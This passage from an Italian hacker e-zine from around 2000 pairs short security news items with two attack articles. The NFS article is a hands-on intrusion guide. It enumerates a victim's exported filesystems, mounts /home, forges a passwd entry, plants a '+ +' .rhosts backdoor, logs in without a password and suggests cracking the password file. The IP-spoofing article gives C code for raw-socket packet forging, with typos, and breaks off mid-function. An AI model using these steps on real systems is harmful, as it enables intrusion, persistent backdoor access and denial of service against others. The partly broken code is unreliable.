che portò alla sua scarcerazione dopo anni di galera, infatti, gli veniva
proibito non solo il contatto con qualsiasi computer ma anche
l'esprimersi pubblicamente su materie informatiche.
Il problema di Mitnick, dunque, non è solo quello di poter accettare le
collaborazioni che gli vengono proposte da numerose riviste e giornali
specializzati in internet e informatica ma anche quello di trovare un
posto di lavoro. Mitnick non è infatti più un ragazzino, la sua
"specializzazione" è ovviamente tecnico-ingegneristica ma le limitazioni
imposte dal tribunale, dice, gli impediscono di guadagnarsi da vivere...
Ad ascoltare l'appello di Mitnick sarà il giudice distrettuale Mariana
R. Pfaelzer, il magistrato che condannò l'hacker a 54 mesi di prigione.
Sul suo giudizio peserà senz'altro quanto scritto dal sorvegliante di
Mitnick, Larry Hawley: "In relazione alle numerose richieste che ha
ricevuto per scrivere articoli, recensire giornali e parlare a
conferenze, riteniamo necessario proibire tali attività e raccomandiamo
di trovare un posto di lavoro in un settore non collegato al computing"
.
Va detto che nel recente passato Mitnick è stato ascoltato addirittura
da una delle Commissioni parlamentari americane che si occupano di
sicurezza delle infrastrutture informative in qualità di "esperto".
Una "testimonianza" che giocherà probabilmente un ruolo importante
nell'udienza di oggi.


+--< Bucare ICQ è davvero troppo facile >--+ ]26/06/2000[ Bug ]

"Ci sono più buchi nella programmazione di ICQ che in Windows98": questa
la descrizione che viene fatta del programma di instant messaging di
America Online da uno degli innumerevoli siti che propongono softwaretti
e softwarini per mandare in tilt ICQ e i suoi utenti.
Sì, perché se da sempre la rete è utilizzata da cracker di ogni livello
per passarsi programmini ad hoc per bucare quà o là, pare proprio che di
questi tempi ICQ sia diventato un obiettivo preferenziale per un certo
numero di siti "dedicati al cracking".
Basti pensare che su siti che illustrano tecniche di hacking, phone
phreaking e via dicendo, ICQ tiene banco con tutto un capitolo di
approfondimento.
Questo accade con decine di siti che abbiamo visitato in questi giorni,
tutti densi di elenchi di programmi con cui inviare migliaia di messaggi
contemporaneamente ad un account ICQ, con cui individuare il numero IP
del computer che usa il sistema scambiamessaggini, con cui mandare in
tilt e far chiudere ICQ all'utente-vittima.
Ci sono anche programmi meno "aggressivi", come quelli che "si limitano"
a copiare la lista dei contatti di un certo utente ICQ o che permettono
di entrare nella lista di un utente autorizzandosi da sé.
Ciò che più può preoccupare di questi attacchi, per un utente ICQ che
passa molte ore collegato alla rete, è la quantità di sistemi di facile
utilizzo che permettono ad un aggressore di recuperare l'indirizzo IP e
la porta utilizzata dalla macchina dell'utente. In quel caso, infatti,
senza volerlo si fornisce una via d'accesso al proprio computer facile
facile.
Tra l'altro, individuare questi programmi in rete, come dimostra una
semplice ricerca su un motore, richiede soltanto pochi minuti. Ed è
curioso, di fronte a tutto questo, che solo qualche giorno fa America
Online, certamente al corrente della cosa, abbia affermato che
l'incompatibilità dei propri sistemi scambiamessaggi con quelli di altri
produttori è da ascrivere al timore di perdere qualcosa sul lato
sicurezza. Una gruviera, con qualche buco in più, rimane sempre una
gruviera.


+--< RoboHacker testa la sicurezza dei sistemi >--+ ]26/06/2000[ Technology ]

Per collaudare la sicurezza degli ambienti informatici non servirà più
assoldare team di hacker o di espertoni, né perdere denaro in consulenze
speciali. Basterà servirsi di un robot intelligente: questa la scommessa
di Sanctum, azienda che ha prodotto un software attacca-sistemi.
Secondo Sanctum, il suo prodotto, RoboHacker, è in grado di compiere
attacchi mirati ai sistemi da testare, di intervenire sulle configurazioni,
di inviare "cookie avvelenati", di creare buffer overflow. Ma è anche un
mezzo, sostiene l'azienda, per "prevenire", perché sarebbe in grado di
scovare codici nascosti, file infilati in un server da terzi e via dicendo.
Una volta eseguiti tutti i tentativi di hacking predisposti, RoboHacker
offre un report dettagliato che dovrebbe consentire agli amministratori
di sistema, secondo Sanctum già euforici per il denaro risparmiato in
consulenze, di lavorare sulle eventuali vulnerabilità.
La sfida è lanciata, dunque, e ora sono in molti a chiedersi se funzionerà.
In ogni caso sarà molto difficile convincere chiunque che un software, per
quanto evoluto, possa sostituire le capacità e l'esperienza di un
professionista della sicurezza.


+--< Hacker trova 24mila carte di credito online >--+ ]28/06/2000[ Cyberwar ]

I dati relativi a 24mila carte di credito: questo il bottino che un hacker
avrebbe potuto prelevare e utilizzare a proprio piacimento se non fosse stato,
appunto, un hacker anziché un cracker. Un ignoto consulente di sicurezza, che
ha informato della cosa il Times di Londra, è entrato nei sistemi del provider
Redhotant e ha catturato, pare con una certa facilità, non solo i dati delle
carte di credito ma anche nominativi e altri dettagli relativi ai singoli
utenti del fornitore d'accesso britannico.

L'operazione, a cui il Times ha dato un certo risalto, viene però negata
dall'azienda secondo cui nessuno avrebbe potuto, dall'esterno, arrivare a
conoscere dati così protetti. L' hacker, che sostiene di aver avvertito per
ben due volte il provider della debolezza dei suoi sistemi prima di passare ai
fatti, ha però specificato il metodo utilizzato per la "dimostrazione" e ha
anche comunicato i nomi di alcuni personaggi celebri che sono abbonati al
provider.
I sistemi di Redhotant, provider che per 30 sterline l'anno offre accesso
illimitato pur soffrendo di congestione di banda, sarebbero stati bucati con
un proxy.
L' hacker, infatti, ha affermato di essere entrato assumendo l'identità di un
utente e di essere riuscito non solo ad arrivare al database clienti, ma
anche ad accedere al network interno del provider. "Si è trattato - ha detto
al Times - di un gioco da ragazzi. Non è stato un hacking tradizionale, in
quanto non ho avuto bisogno di password, è bastato infatti cercare
una chiave per trovare una porta di ingresso. Il più grave errore di
Redhotant è stato di tenere i suoi dati sullo stesso disco e sulla stessa
macchina utilizzata per i propri servizi"
.


+--< Italia, pedopornografi abili come hacker? >--+ ]28/06/2000[ Cyberwar ]

"Il luogo di elezione dei pedofili": questa è internet nelle parole del
Commissario della sezione antipedofilia della Polizia, Maria Cristina Ascenzi
"Da cinque anni a questa parte - ha denunciato Ascenzi ieri - il fenomeno è
esploso qualitativamente e quantitativamente.

Chi traffica materiale pornografico o l'adulto in cerca di conoscenze
infantili ha affinato le sue competenze tecnologiche"
. Pedopornografi hi-tech?
Pare proprio di sì. Secondo il Commissario, chi commette abusi "usa macchine
sofisticate e sfrutta le potenzialità di segretezza e di collegamenti
illimitati della rete senza lasciare traccia del suo passaggio"
.

Una abilità da hacker, dunque, contro cui serve ma non basta la normativa
antipornografia infantile varata ormai da tempo in Italia e che prende di
mira non solo il commercio di materiale pedopornografico ma soprattutto il
commercio che di questi contenuti si fa in rete.

Secondo Ascenzi la legge "ha fornito nuovi e importanti strumenti di
investigazione ma c'è molto da fare perché il fenomeno incalza"
. I numeri
derivati dalle indagini sono piuttosto impressionanti. Negli scorsi due anni
sarebbero 3.200 i siti, le chat room e i newsgroup monitorati dai cybercops
italiani, con indagini che hanno coinvolto 232 persone, con l'apertura di 591
fascicoli e con provvedimenti restrittivi comminati a venti persone.

Numerose, 421, anche le segnalazioni alle autorità estere. Ma non va tutto
per il meglio, a sentire Ascenzi, secondo cui "la legge ci permette le
intercettazioni telematiche, l'acquisto simulato di materiale pornografico,
la possibilità di ritardare l'esecuzione dei provvedimenti di cattura quando
sia necessario acquisire rilevanti elementi probatori, ma i fondi per gli
acquisti simulati sono scarsi, i PC a nostra disposizione molto più antiquati
di quelli usati da chi andiamo a contrastare e non tutti i provider registrano
l'utenza chiamante, cioè il numero telefonico di chi si collega, mentre altri
non conservano i tabulati che per poco tempo"
.

---]CyBOrG[ & The Jackal---

###################################################################
####### CCC Y Y BBBB EEEE RRRR PPPP U U N N X X #######
####### C Y Y B B E R R P P U U NN N X X #######
####### C Y BBBB EEE RRRR PPPP U U N N N X #######
####### C Y B B E R R P U U N NN X X #######
####### CCC Y BBBB EEEE R RR P UUU N N X X #######
###################################################################


----------------------------------------------------------------[ HacKinG ]---
===] VULNERABILITA' IN NFS ]==================================================
========] Montarsi sulla propria macchina un intero server [==================
-----[ Vulcan ]---------------------------------------------------------------

.......::'''''|_ _v u l c a n_ _|'''''::........
^^^^^ ^^^^^


Buongiorno, allora, la mia collaborazione con AiS mi ha spinto, anche nel
nuovo numero, a partorire qualcosa di informe e malefico, qualkosa che non
dara' scampo anche all'amministratore di sistema più evoluto.

Naturalmente l'articolo è rivolto sopratutto agli smanettoni della rete e a
coloro che vogliono addentrarsi nei meandri delle tecniche di utilizzo dei
sistemi non documentate.
Se invece siete amministratori di sistema vi potrà servire per controllare
la configurazione del vostro sistema e dei servizi che avete in rete e che
incautamente lasciate a disposizione delle menti malate come me.

In realtà le tecniche descritte in questo articolo non le ho mica inventate
o partorite io, esistendo già da diverso tempo. Ma siccome qualkuno di voi
può anche non saperne niente e magari si sta svegliando solo ora dal
cyberletargo, allora mi sono deciso a scrivere due righe.

Stiamo parlando di NFS cioè network file system. NFS è un servizio creato da
SUN microsystem con lo scopo di rendere disponibili in rete i filesystem dei
pc unix.
Il tutto funziona tramite il comando mount....si lo stesso con cui linux
'monta' il floppy ed il cdrom dentro la dir /mnt specifica, solo che in questo
caso verrà montata sulla vostra macchina una directory del filesystem vittima
o tutto il filesystem se siete fortunati.

In pratica consente l'accesso al filesystem di un sistema remoto come fosse
davanti a voi, o meglio come se fosse in una vostra directory.
Ripetendovi che come al solito non sono responsabile delle cazzate che
farete vi invito a controllarvi e ad evitare di fare stronzate in puro stile
lamers.

Non fate mai danni quando provate qualkosa su un sistema remoto! Se davvero
il vostro scopo e' fare dei danni allora lasciate perdere di leggere questo
articolo.
In ogni caso io non mi ritengo responsabile per ciò che combinerete e quello
che state leggendo ha esclusivamente uno scopo conoscitivo e didattico.

Allora vediamo di iniziare.

Cosa vi serve?

- 1 - Un PC di qualunque tipo. (cosa? non lo avete? ma che cazzo dite? e
come state leggendo?)

- 2 - Linux installato sulla macchina. (non importa la versione del kernel,
certo se avete l'ultima non beta, il 2.2.14 meglio per voi.)

- 3 - Sapere digitare qualcosa sulla tastiera.(Hey se non avete nemmeno la
tastiera allora siete proprio delle pecore...)

- 4 - Vi serve avviare linux come root in quanto, dopo avere importato sul
nostro 'pinguino' il filesystem remoto, bisognerà fare delle
operazioni ammissibili solo ad utenti con privilegi di root.

Si vi serve linux, ma può andare bene anche una qualsiasi shell,
naturalmente se soddisfa le condizioni di sopra, sopratutto a livello di
possesso di un account root. Bene al lavoro allora.

NFS è arrivato oggi alla versione 3 ed è implementato in quasi tutte le
distribuzioni di UNIX. La possibilità di portare un attacco da remoto a
questo servizio non è però automatica. La corretta configurazione di NFS
prevede che solo alcuni host autorizzati possano accedervi, ma spesso
l'ignoranza in materia di alcuni amministratori di sistema produce cazzate
grandi quanto na casa, per cui l'intero filesystem spesso è esportabile a
chiunque ne faccia richiesta.

Ricapitoliamo, NFS ed il suo server mountd devono essere
configurati in maniera errata, per essere vulnerabili, consentendo
l'esportazione
delle directory o dell'intero filesystem del server vittima a chiunque.
Allora voi vi chiederete: ma io come faccio a sapere se NFS di un server
vittima
e configurato male?
Ecco questa è una buona domanda. Procediamo con ordine però. Allora alcuni
amministratori di sistema più cazzuti degli altri hanno ben pensato di
aliminare
il servizio dai loro server in quanto pericoloso per la sicurezza.
Altri, giustamente più pignoli lo hanno lasciato, ma configurandolo in
maniera
corretta.
Ma ora passiamo alla pratica. Visto quello che abbiamo detto, la prima cosa
da fare è controllare se NFS è un servizio che gira sulla macchina vittima.
Mettiamo che la nostra vittima sia il server 'hostvittima.it'.
Per controllare che il sevizio è attivo usiamo:


[root@localhost /root]# rpcinfo -p hostvittima.it


Spero che sappiate che la parte da scrivere è solo quella dopo il #.
A questa richiesta il sistema remoto risponderà, ad esempio, in questo modo:


program vers proto port

100000 3 tcp 111 rcpbind
100000 2 tcp 111 rcpbind
100000 1 tcp 111 rcpbind
100000 3 udp 111 rcpbind
100000 2 udp 111 rcpbind
100000 1 udp 111 rcpbind
100005 1 tcp 32811 mountd
100005 2 tcp 32811 mountd
100005 3 tcp 32811 mountd
100005 1 udp 32870 mountd
100005 2 udp 32870 mountd
100005 3 udp 32870 mountd
100003 1 udp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs

Questo comando ci da in pratica l'elenco dei servizi rpc disponibili,
comprensivo di numero del processo, porta, protocollo utilizzato e
nome che identifica il servizio.
Bene cerchiamo di fare mente locale ora. Nel server è implementato il
mountd,
ed il servizio nfs sembra attivo. Esiste in pratica la possibilità che
qualche directory sia esportabile o meglio ancora tutte le directory!
Andiamo a controllare usando un altro comando della shell di quello
stupendo sistema operativo che è linux.


[root@localhost /root]# showmount -e hostvittima.it


Questo comandino è moooolto importante. Vi darà infatti un risultato
variabile da cui saprete se è possibile attuare un mount sulla vostra
macchina o meno. Vediamo più in dettaglio il risultato.


/
/home (everyone)
/usr (everyone)
/bin (everyone)


Ecco questo è un tipico caso di server NFS configurato male. A questo
punto potete cantare vittoria. Come vedete tutto l'intero filesystem
(la directory radice /) è esportabile a chiunque (everyone). Indipercui
potrete montarvi tutto il filesystem sul vostro caro linux...hehehe.
Bene per far cio prima di tutto dobbiamo creare una cartella che lo
contenga, questo benedetto filesystem remoto. La creeremo pertanto
all'interno della directory /mnt, e la chiameremo come ci piace....
io, nell'esempio l'ho chiamata 'box'.
Usiamo il comando mkdir (make dir)e creiamola allora.........


[root@localhost /root]# mkdir /mnt/box


ok se ora andiamo a controllare dentro la dir /mnt ne troveremo una
nuova che si chiama 'box' appunto e due vecchie, quelle di default
'cdrom' e 'floppy'.
Benone ci siamo? Possiamo continuare? ok.......
Passiamo ora all'operazione vera e propria, cioè quella di 'montare il
fylesystem'. A tale scopo utilizziamo un altro comando di linux che
si chiama 'mount' lo conoscete no? Credo che se avete avuto a che fare
con il floppy o col cdrom lo conosciate sicuro. Comunque per coscienza
personale vi do qualche informazione dopo.
Intanto introduciamo il comando............


[root@localhost /root]# mount -nt nfs hostvittima.it:/direxportabile
/mnt/box


Allora piccola spiegazione dentro /direxportabile mettete semplicemente
il path della directory esportabile che abbiamo trovato precedentemente
col comando showmount, vi ricordate? Andate a rivedere un po più su.....
Bene, ad esempio vogliamo montarci la dir /home del server www.megasys.net?
(è solo un esempio! nemmeno esiste) nulla di più semplice.....


[root@localhost /root]# mount -nt nfs megasys.net:/home /mnt/box


a noi interessa particolarmente la dir /home e poi vedremo il perche.
Ok credo che possa bastare come esempio. Ricordatevi sempre che quello
che possiamo montare, che inseriremo come parametro nel comando mount
lo ricavate dalle informazioni che vi fornisce showmount ok?
Ora facciamo na breve parentesi su mount visto le continue richieste
di gente via email a cui non funzionano i floppy di win su linux...

I M P O R T A N T E
_________________________________________________________________________
LA PARENTESI NON RIGUARDA L'ARTICOLO MA PENSO SIA MOLTO UTILE LO STESSO

Allora molti mi chiedono come mai i loro floppy di windows non vengono
letti da linux, che invece rileva un errore berbacco!
Eccovi spiegato. Linux è in grado di leggere quasi tutti i formati di file
usati anche da windows(lasciate perdere gli .exe però) .txt .jpeg ma ha
bisogno, per farlo, che gli venga detto che la formattazione è di tipo
FAT diversa pertanto da quella di linux, che è linux/native hehehe.
E come glie lo spieghiamo al nostro linux? Facile.......
Allora quando eseguite il mount di un dispositivo quale ad esempio il
floppy dovrete specificare un parametro di riconoscimento e cioè vfat.
Passiamo ad un esempio pratico. Montiamo un FLOPPY di WINDOWS...

[root@localhost /root]# mount /dev/fd0 /mnt/floppy -t vfat

ed ecco che magicamente il floppy viene montato......ooooohhhh!
Oppure se siamo proprio megalomani, possiamo montare tutto l'hard
disk dove si trova windows.....prima però create sempre una cartella
che lo contenga con # mkdir /mnt/hard

[root@localhost /root]# mount /dev/hda1 /mnt/hard -t vfat

Avrete tutto l'hard disk a disposizione coi dati di windowssss!!!!
Naturalmente mi sto riferendo al caso abbiate entrambi i S.O. su due
partizioni dello stesso hard disk!
OK parentesi chiusa.

P A R E N T E S I C H I U S A
_______________________________________________________________________

Completiamo il discorso su NFS allora?
Perfetto.
Allora dopo il comando dato,.....


[root@localhost /root]# mount -nt nfs megasys.net:/home /mnt/box


ci ritroviamo con un intero server, appunto megasys.net, e tutte le sue
directory montate sulla nostra linux box. Che fare ora? Lavoriamo un poco
sul file delle password! che ne dite? Inseriamo nel nostro file delle pass
un utente che si trova nel sistema importato in questo modo ci garantiremo
un accesso in maniera 'furbesca' diciamo. Non ci state capendo nulla? lo so
è colpa mia ma con un esempio pratico capirete.
Spostiamoci nella dir dove si trova il server che ci siamo importati e
vediamo un poco cosa c'è!


[root@localhost /root]#cd /mnt/box
[root@localhost /root]#ls -lh


sapete a cosa serve ls -lh vero? no? ok è un comando di enumerazione di file
e directory di linux diciamo che è l'equivalente di dir. Comunque se non
conoscete questi comandi fondamentali io vi consiglio prima di trovarvi una
buona guida o manuale che dirsivoglia e studiarveli un poco.
Torniamo a noi, ecco l'immediata e pronta risposta della nostra shell!


drwxr-xr-x 3 322 other 1024 Jan 3 03:25 vespro
drwxr-xr-x 2 93 other 512 Oct 15 08:45 Valk
drwxr-xr-x 11 207 other 512 Feb 8 17:00 |KillAll|
drwxr-xr-x 2 321 other 512 Oct 27 06:15 _vulcan_
drwxr-xr-x 6 news news 512 Mar 6 2000 news
drwxr-xr-x 2 linux other 512 Jan 24 04:17 CyBoRg
drwxr-xr-x 4 opman other 512 Sep 28 06:16 Mfonzie
drwxr-xr-x 3 turbo other 2048 Mar 1 10:25 CRACKNET
drwxr-xr-x 2 82 other 512 Feb 12 07:45 machoman
drwxr-xr-x 5 68 other 512 Feb 1 15:00 alfredo
drwxr-xr-x 5 45 other 512 Oct 27 01:15 sysad


ecco cosa contiene la directory /home del server. Naturalmente i nomi
potranno
essere molti di più, ma questo non è importante. Qual'è il nostro scopo?
Creare
nel nostro passwd file(di cui vi ricordo il percorso /etc/passwd) un utente
uguale ad uno di quelli che vediamo nella directory home del server. Mi
spiego
meglio. Avendo nel nostro file password(quello del nostro linux) un utente
uguale a quello del sistema bersaglio avremo accesso alla sua directory,
dopo
alcuni smanettamenti. Ok? Perfetto. Prendiamo no sfigato qualsiasi tipo
_vulcan_ e segnamoci il suo numero utente che è 321. Ora andiamo a creare
un nuovo utente nel nostro file delle password. Apriamolo in modalità
grafica, con l'editor standard di linux o con un editor tipo vi o pico e
aggiongiamo una nuova riga nuova:


_vulcan_::x:3215:5::/home:/bin/sh


con questa riga abbiamo inserito nel nostro file password un accesso con
shell all'utente _vulcan_, la shell è quella standard "sh" ma possiamo anche
assegnargli una bella bash se vogliamo. Da questo momento avremo accesso
alla home directory di _vulcan_! è nostra! che facciamo ora? dobbiamo
immettere un doppio "+ +" all'interno del file .rhost della dir home di
_vulcan_, in questo modo possiamo entrare ed uscire dal sistema senza
fornire
una password....hhehehehe.... la nostra backdoor classica.


[root@localhost /root]#echo + +>>_vulcan_/.rhosts


Spiegazione del comando: "echo" - cioè un ordine di scrivere i due "+ +",
dove? dentro ">>" _vulcan_ e nel file .rhost che vi ricordo è un file
nascosto. In linux tutti i file o le dir che iniziano col . sono nascosti.
Perfetto abbiamo finito. Ora potremo accedere al sistema con il comando
"rlogin" che si usa appunto in associazione ad un file .rhost per accedere
senza password.


[root@localhost /root]#rlogin -l_vulcan_ megasys.net

SCO Openserver 5 January 2000
Last login: Sat Jan 21 12:16:36 from albacom.net
you have mail.
>$_


OK abbiamo finito ora siamo dentro, possiamo metterci qualke backdoor più
evoluta certo ma le cose di base le abbiamo fatte. Il resto sta tutto alla
vostra fantasia! Potrete prendervi il file delle password ad esempio e poi
decrittarlo allegramente con john the ripper o applicarci qualke exploit in
locale. Insomma ormai il buco lo avete trovato....ed il sistema è vostro!
Se siete buoni mandate una email all'amministratore di sistema e lo
avvertite del suo problema. Se siete intelligenti vi sperimenterete tutto
quanto solo sulla vostra macchina e cercherete di capire il funzionamento
di NFS in locale, cercando di configurarlo in modo da rendere /home
esportabile a qualsivoglia utente. Infine se siete cattivi cazzi vostri...
....io sono buono! hehehehehehe

Se avete domande, problemi oppure ho scritto qualke cazzata siete pregati
di correggermi all'email vulcan12mm@hotmail.com indicando nell'oggetto
"email per vulcan", questo perchè nella mailing list di AiS ci sono ogni
giorno decine di messaggi ed io non posso leggermeli tutti!
Un ultima cosa. Vulcan è un modello mitragliatrice multicanna a rotazione
di costruzione americana non è un vulcano, per cui in IRC evitate se potete
di chiamarmi Vesuvio, Etna... uno mi ha chiamato persino Everest..vedi tu
l'ignoranza, .....mah.... hahahahhahaha ciao

---Vulcan---

----------------------------------------------------------------[ HacKinG ]---
===] ATTACCHI AL TCP/IP ]=====================================================
-----[ Davser ]---------------------------------------------------------------

Info: davser@tin.it - http://davser.cjb.net - ICQ 19930061

Questo articolo e' una raccolta di testi sull'attacco al TCP/IP oltre a
qualcosa di mio. Ho attinto da varie riviste, libri, ecc. quindi non mailatemi
dicendo che avete gia' letto queste cose da altre parti!

OK, cominciamo...

Il protocollo TCP/IP, dalla sua comparsa ad oggi, e' stato analizzato dal
punto di vista della sicurezza, delle performance, dell'ottimizzazione e degli
stati indefiniti in maniera molto profonda. Nel corso del tempo varie
vulnerabilita' sono state scoperte, sia nel protocollo in se', che nelle varie
implementazioni disponibili (ossia gli stack TCP/IP dei sistemi operativi)

Tuttavia, una implementazione ben pensata del TCP/IP, e' ancora in grado di
fornire buoni livelli di sicurezza nel caso in cui siano state prese tutte le
precauzioni necessarie.

****L'IP spoofing attack*****

Per chi si avvicina al mondo della sicurezza, l'attacco conosciuto come
"IP spoofing" e' spesso fonte di confusione. L'equivoco sta nel fatto che col
termine "IP spoofing" si indicano due attacchi distinti: il primo consiste
nello spedire dei pacchetti IP aventi l'indirizzo sorgente contraffatto,
l'altro nell'utilizzo del primo attacco per costruirne uno piu' complesso,
conosciuto come "blind spoofing", ovvero spoofing alla cieca. Qui vedremo in
dettaglio il primo dei due attacchi.

L'IP spoofing e' una tecnica che consiste nell'inviare dei pacchetti
opportunamente 'modificati' per far credere al destinatario, che gli stessi
arrivino da tutt'altra parte e, quindi, per rendersi 'anonimi' (o meglio
spacciarsi per qualcun altro) agli occhi della "vittima". Questo si ottiene
modificando l'indirizzo IP sorgente(source IP) nell' header (intestazione) del
pacchetto (datagramma IP). L'IP spoofing viene utilizzato per molti attacchi
sia di tipo D.o.S. (Denial of Service, attacchi che possono mettere fuori uso,
bloccare o rallentare il sistema momentaneamente... fastidioso ma non provoca
danni gravi), sia per il tipico Hacking (attacchi molto piu' interessanti che
possono permettere di guadagnare particolari accessi nei sistemi) e utilizzato
sia in modo diretto (attaccando cioe' direttamente il sistema che riceve i
pacchetti spoofati), sia in modo indiretto (sfruttando cioe' le risposte che
la macchina destinataria dello spoof invia al presunto mittente).

Gli attacchi D.o.S. che si possono realizzare cmq sono molti: dai vari flood
(syn flood, rst flood) al click, al boink ecc. Oppure, se proprio si vuole
avere la comunicazione bilaterale, si potrebbe tentare di instaurarla alla
ceca, cercando di prevedere le varie risposte della vittima ai nostri
pacchetti, e rispondendo a nostra volta in modo adeguato (assicurandoci pero'
che l'IP da noi spoofato sia in quel momento irraggiungibile e non possa
quindi rispondere anche lui alla vittima (che, sta inviando pacchetti
all'indirizzo da noi spoofato).

Uno schemino chiaro che riassume l'IP spoofing (e si trova su praticamente
tutti i documenti che trattano IP spoofing), e' all'incirca questo:

host A <---------------->X<--------------> host B
|
host S ---------------->/


in cui: noi siamo host S, il bersaglio del nostro attacco e' host B e il e
l'indirizzo sorgente che metteremo nell'header dei pacchetti al posto del
nostro, corrisponde al'indirizzo di host A.
Come si puo' realizzare lo spoofing? Be' per farvi un idea, un programma che
lo realizza e che probabilmente avrete utilizzato qualche volta e' il famoso
Click della 7th sphere... che fa esattamente questo: Ipotizziamo un tipico
attacco D.o.S. da lamer in IRC. Secondo lo schemino che c'e' li sopra: se noi
siamo host S e vogliamo disconnettere host B dal server IRC host A (un server
a caso irc.tin.it hihihi) che facciamo? Impostiamo il Click con i giusti dati
e scegliamo tra il modo client side oppure server side, quindi lanciamo
l'attacco. Mettiamo di aver scelto l'attacco client side....
Succede che il Click comincia a mandare a host B pacchetti ICMP spoofati
aventi come indirizzo sorgente host A (server IRC) e come contenuto una frase
del tipo "Sono Esploso!!". ("host unreachable") Host B (vittima) a questo
punto riceve questa 'lettera/pacchetto' proveniente da Host A (server IRC),
legge il messaggio e realizza che host A (server IRC) e' esploso .. quindi
pensa: "che cavolo ci rimango connesso a fare a un indirizzo di server che non
c'e' piu' perche' e' esploso?"
a questo punto si disconnette. L'attacco e'
realizzato, host B e' disconnesso da IRC. Nel caso avessimo scelto il modo di
attacco server side, il procedimento e' uguale ma i pacchetti vengono mandati
a host A (server IRC) e provenienti da host B (vittima), quindi e' il server
IRC che scollega host B credendolo 'esploso'. Questo e' solo un esempio di
attacco. In effetti, sfruttare appieno l'IP spoofing (anche per cercare di
far qualcosa; in piu' dei tipici D.o.S.), significa soprattutto potersi
costruire i pacchetti da inviare, su misura.. a seconda del tipo di attacco
che vogliamo realizzare. Questo risulta piu' facile da ottenere ad esempio su
sistemi Linux che su Winzozz 9x, pero' per questi ultimi potreste utilizzare
programmi appositi (ad esempio exploit generator) che funzionano abbastanza
bene.

Come si fa a mandare un pacchetto spoofato?

Beh, ci sono modi e modi. Da Unix & Company e' molto facile: basta creare un
socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli
header IP e TCP (ma anche UDP o ICMP) non standard, cioe' come quelli che si
trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere
anche l'ip del mittente, cosa che invece con le normali funzioni di sending
viene automaticamente fatta dal protocollo usato.

In principio si crea un bell'header ip tipo:

struct ipheader {
unsigned char verlen, tos; //versione+lunghezza header, tipo
unsigned short lenght, identification, flageoffset; //lunghezza, id,
flags+offset
unsigned char ttl, protocol; //time to live, protocollo utilizzato
unsigned long int source, destination; //indirizzo ip sorgente, destinazione
};

ecco, bello vero?
Se esaminate attentamente vedrete:

* un char (8 bit) che include sia la versione ip che la lunghezza
dello header (contenitori a 4 bit non li so trovare io in c...)

* un char (8 bit) per il tipo di servizio (TOS)

* uno short (16 bit) per la lunghezza, uno per l'identificazione e uno che
include i 3 bit dei flag e i 13 del fragment offset

* un altro char per il time to live, ovvero su quanti server pu passare
prima di fermarsi

* un altro char che identifica il protocollo

* due long (32 bit) che identificano l'ip sorgente e quello di destinazione

Per agevolarci ora creeremo uno pseudo ip header:

struct pseudoipheader {
unsigned long int source, destination;
char byte_zero, protocol;
unsigned short TCP_UDP_lenght;
};

qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo
utilizzato e la lunghezza del tcp o dell'udp.
Ora veniamo ai protocolli TCP e UDP:

struct tcpheader {
unsigned short source, destination;
unsigned long int seq, ack;
unsigned short offset_flags, window, checksum, urgent;
};

da notare che i source e i destination sono non degli indirizzi, ma delle
porte (short a 16 bit), qui dovete mettere la porta sorgente e quella
destinazione, insomma. Poi c'e' il SEQ e l'ACK, interi a 32 bit, e infine
abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent
pointer. Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :)

struct udpheader {
unsigned short source, destination, lenght, checksum;
}
Tutto chiaro no? E per finire si crea uno struct di scambio di dati spoofati,
anche questo per facilitarci la vita...

struct spdataexchange {
int fd;
char *data;
int datalen;
char *source;
unsigned short sourceport;
char *destination;
unsigned short destinationport;
unsigned long seq, ack;
unsigned short flags;
char *buffer;
int ip_optlen, tcp_optlen;
}

In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo
sul pacchetto da inviare... Ora, come facciamo ad inviare un pacchetto???
Creeremo una funzione detta sendsppacket:

void sendsppacket(struc spdataexchange *sp, unsigned char protcollo)
{
int sp_status;
struct sockaddr_in *sp_serv;
struct hostent *sp_help;
int HEADER_BASE;
bzero((char *)&sp_serv, sizeof(struct sockaddr));
sp_serv.sin_family = AF_INET;
sp_serv.sin_addr.s_addr = inet_addr(sp->destination);
if(sp_serv.sin_addr.s_addr==(unsigned int)-1)
{
if(!(sp_help=gethostbyname(sp->destination)))
fprintf(stderr,"unknown host %s\n",sp->destination), exit(1);
bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght);
}
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi
passaggi
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
case default: exit(1); break;
}
sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+
IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv,
sizeof(struct sockaddr));
if((sp_status < 0) ||
(sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen))
{
if(sp_status < 0)
perror("sendto()\n"), exit(1);
printf("Trasmessi soltanto %d bytes di %d\n", sp_stat,
sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen);
}
}

Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i
procedimenti di routine si tenta di risolvere l'host di destinazione, se non
si riesce si esce (splendido gioco di parole...), se invece l'host esiste si
copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li
definite prima con #define (TCP 6 e UDP 17), se e' tcp l'header_base sara'
ovviamente la lunghezza della dimensione minima dell'header tcp(20), se e'
udp quella dell'udp (8) e se e' altro esce :), l'ip e' 20. Poi si manda il
pacchetto spoofato realizzato prima, e si vede se il risultato e' positivo o
meno, quanti bytes sono stati inviati, eccetera. La lunghezza naturalmente e'
la lunghezza dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip
(20) + la lunghezza delle opzioni ip. 500 righe! Uff! Che fatica...
Dovremmo esserci... Per fixare i vostri header IP e TCP, ci sono due pratiche
(ALLA FACCIA!) funzioni:

void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo)
{
struct ipheader *sp_help_ip;
int HEADER_BASE;
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break;
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
